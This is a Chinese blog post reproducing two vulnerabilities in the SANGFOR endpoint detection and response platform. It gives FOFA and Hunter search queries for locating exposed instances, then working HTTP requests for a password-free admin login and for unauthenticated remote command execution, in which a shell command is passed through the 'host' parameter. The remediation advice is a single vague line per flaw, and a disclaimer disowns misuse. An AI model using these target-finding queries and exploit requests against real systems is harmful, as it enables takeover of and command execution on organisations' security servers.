记一次某信的漏洞复现

admin 2023年10月15日23:39:14评论59 views字数 807阅读2分41秒阅读模式

前言

声明:这里是由零信任安全实验室组建的一个知识平台,平台有批量验证的脚本、工具以及一些漏洞的POC,后续还会分享网络安全资源(漏洞挖掘文章 工具 资讯以及SRC漏洞挖掘案例分享等等,资源多多,干货多多!
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者和本公众号无关。工具
来自网络,安全性自测。

作者:杳若

深信服-SANGFOR终端检测响应平台漏洞复现

通常访问的页面如下,存在登录框

记一次某信的漏洞复现

信息收集

FOFA语法


  1. title="SANGFOR终端检测响应平台"

需重点关注框框的图标,可以聚焦资产搜索

记一次某信的漏洞复现


  1. icon_hash="1307354852"

鹰图搜索


  1. web.title="SANGFOR终端检测响应平台"

可聚焦资产


  1. web.icon=="68e28d49856759ddeb91b6be3d6f7e42"

记一次某信的漏洞复现

SANGFOR终端检测响应平台 - 任意用户免密登录

漏洞复现

路由后拼接/ui/login.php?user={{需要登录的用户名}}

这边以admin权限用户为例


  1. GET /ui/login.php?user=admin HTTP/1.1
  2. Host: {{Hostname}}

访问之后会像这样直接进入后台

记一次某信的漏洞复现

修复方案

该类逻辑漏洞的起因往往与鉴权有关,需做好权限校验

SANGFOR终端检测响应平台 - 前台RCE

同一套系统

漏洞复现

路由后拼接/tool/log/c.php?strip_slashes=system&host={执行的命令}

命令执行以id为例


  1. GET /tool/log/c.php?strip_slashes=system&host=id HTTP/1.1
  2. Host: {{Hostname}}

大致页面如下所示

记一次某信的漏洞复现

修复方案

该目录代码层面的逻辑问题,需要进行鉴权以及重写等处理

记一次某信的漏洞复现

原文始发于微信公众号(零信任攻防实验室):记一次某信的漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月15日23:39:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次某信的漏洞复现http://cn-sec.com/archives/2115180.html

发表评论

匿名网友 填写信息